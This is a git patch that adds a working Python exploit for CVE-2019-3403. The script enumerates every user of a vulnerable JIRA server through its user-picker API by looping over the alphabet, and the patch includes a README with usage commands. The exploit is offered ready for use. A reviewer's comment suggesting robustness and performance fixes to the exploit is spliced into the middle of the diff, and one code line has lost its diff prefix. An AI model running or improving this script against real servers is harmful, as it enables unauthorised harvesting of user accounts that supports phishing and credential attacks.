From 095c1ab1d543ef4e7eb60b25e8d47b19b8922fe2 Mon Sep 17 00:00:00 2001
From: David McKennirey
Date: Thu, 18 Mar 2021 23:06:19 -0400
Subject: [PATCH] add exploit code
---
 CVE-2019-3403.py | 73 ++++++++++++++++++++++++++++++++++++++++++++++++
 README.md | 29 ++++++++++++++++++-
 requirements.txt | 7 +++++
 3 files changed, 108 insertions(+), 1 deletion(-)
 create mode 100644 CVE-2019-3403.py
 create mode 100644 requirements.txt
diff --git a/CVE-2019-3403.py b/CVE-2019-3403.py
new file mode 100644
index 0000000..7718068
--- /dev/null
+++ b/CVE-2019-3403.py
@@ -0,0 +1,73 @@
+import requests
+from bs4 import BeautifulSoup
+import json
+import argparse
+from functools import reduce
+
+def scrape_jira(target, query, verbose):
+ cleaned_info = []
+ r = requests.get(target, query)
+ users = r.json().get('users')
+ for user in users:
+ soup = BeautifulSoup(user.get('html'), 'html.parser')
+ cleaned_info.append(soup.get_text())
+ if verbose:
+ print(f'[*] Retrieved {len(users)} users for query: {query}')
+ return cleaned_info
+
+def unique(input_list):
+ unique_list = []
+ for x in input_list:
+ if x not in unique_list:
+ unique_list.append(x)
+ return unique_list
+
+parser = argparse.ArgumentParser(description='Scrape User Information from Vulnerable JIRA Instances [CVE-2019-3403]')
+parser.add_argument('-d', '--domain', help='The domain of the target', required=True, type=str)
+parser.add_argument('-q', '--query', help='Specific query to run against the API', default='', type=str)
+parser.add_argument('-o', '--out', help='Output to a file', default='', type=str)
+parser.add_argument('-v', '--verbose', help='Verbose output', action="store_true")
+args = parser.parse_args()
+
+target = f'https://{args.domain}/rest/api/2/user/picker'
+query = {'query': args.query, 'maxResults': 1000}
+
+# Test to see if the target is vulnerable
+print(f'[*] Testing if {args.domain} is vulnerable')
+resp = requests.get(target, params=query)
+if resp.status_code != 200:
+ print(f'[-] {args.domain} is not vulnerable.')
+ exit(0)
+else:
+ print(f'[+] {args.domain} is vulnerable!')
+
+# If there is a user defined query
+if args.query != '':
+ print(f'[*] Requesting user-supplied query: {args.query}')
+ cleaned = scrape_jira(target, query, args.verbose)
+
+# Otherwise scrape everything
+else:
+ print(f'[*] No user-supplied query... scraping everything')
+
+ # This scraping method is really stupid and I hate it...
+ # but it works.
You just search once for each letter of the alphabet
+ scrape_set = [chr(i) for i in range(65,91)]
+ cleaned = []
+ for search in scrape_set:
+ query = {'query': search, 'maxResults': 1000}
+ cleaned.append(scrape_jira(target, query, args.verbose))
+
+ # We have a list of lists, so lets compress that
+ cleaned = reduce(list.__add__, cleaned)
+
+final = unique(cleaned)
+print(f'[*] Scraped {len(final)} users from JIRA.')
+
+# Output
+if args.out != '':
+ with open(args.out, 'w') as f:
+ for user in final:
+ f.write(f'{user}\n')
+for user in final:
+ print(f'[+] User: {user}')
\ No newline at end of file
diff --git a/README.md b/README.md
index 605d103..ed542d6 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,29 @@
 # CVE-2019-3403
-A simple python3 exploit for CVE-2019-3403
+I wanted to easily be able to exploit CVE-2019-3403 to scrape all the users from a JIRA application, so I threw this script together. It isn't the cleanest code ever, and it doesn't handle requests that return over 1000 users (it will just truncate them to the first 1000) - but it can quickly scrape all of the users from a vulnerable JIRA server.
+
+## Usage
+```
+usage: scrape_jira.py [-h] -d DOMAIN [-q QUERY] [-o OUT] [-v]
+
+Scrape User Information from Vulnerable JIRA Instances [CVE-2019-3403]
+
+optional arguments:
+ -h, --help show this help message and exit
+ -d DOMAIN, --domain DOMAIN
+ The domain of the target
+ -q QUERY, --query QUERY
+ Specific query to run against the API
+ -o OUT, --out OUT Output to a file
+ -v, --verbose Verbose output
+```
+
+### Examples
+Scrape everything and save output to a file:
+```
+python3 CVE-2019-3403.py -d jira.example.com -o out.txt -v
+```
+
+Just look for a specific user:
+```
+python3 CVE-2019-3403.py -d jira.example.com -q admin
+```
\ No newline at end of file
diff --git a/requirements.txt b/requirements.txt
new file mode 100644
index 0000000..aeae463
--- /dev/null
+++ b/requirements.txt
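Review bot: In scrape_jira, `users = r.json().get('users')` is iterated unconditionally, so a 200 response whose body is not JSON raises from `r.json()` and a JSON body without a `users` key makes `for user in users:` raise TypeError on None — the status-code check at the top of the script covers neither case; `users = r.json().get('users') or []` avoids the traceback and keeps the verbose count meaningful. The `exit(0)` in the not-vulnerable branch relies on the site-module builtin, which is absent under `python -S`; `sys.exit(0)` with `import sys` is the portable form. `unique` and `reduce(list.__add__, cleaned)` are both quadratic in the number of names, and `list(dict.fromkeys(itertools.chain.from_iterable(cleaned)))` (with `import itertools`) does the flatten and order-preserving dedup in one linear pass. The output file is opened without an explicit encoding, so names containing non-ASCII characters depend on the platform default; `open(args.out, 'w', encoding='utf-8')` makes the written file deterministic.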
@@ -0,0 +1,7 @@
+beautifulsoup4==4.9.3
+certifi==2020.12.5
+chardet==4.0.0
+idna==2.10
+requests==2.25.1
+soupsieve==2.2
+urllib3==1.26.4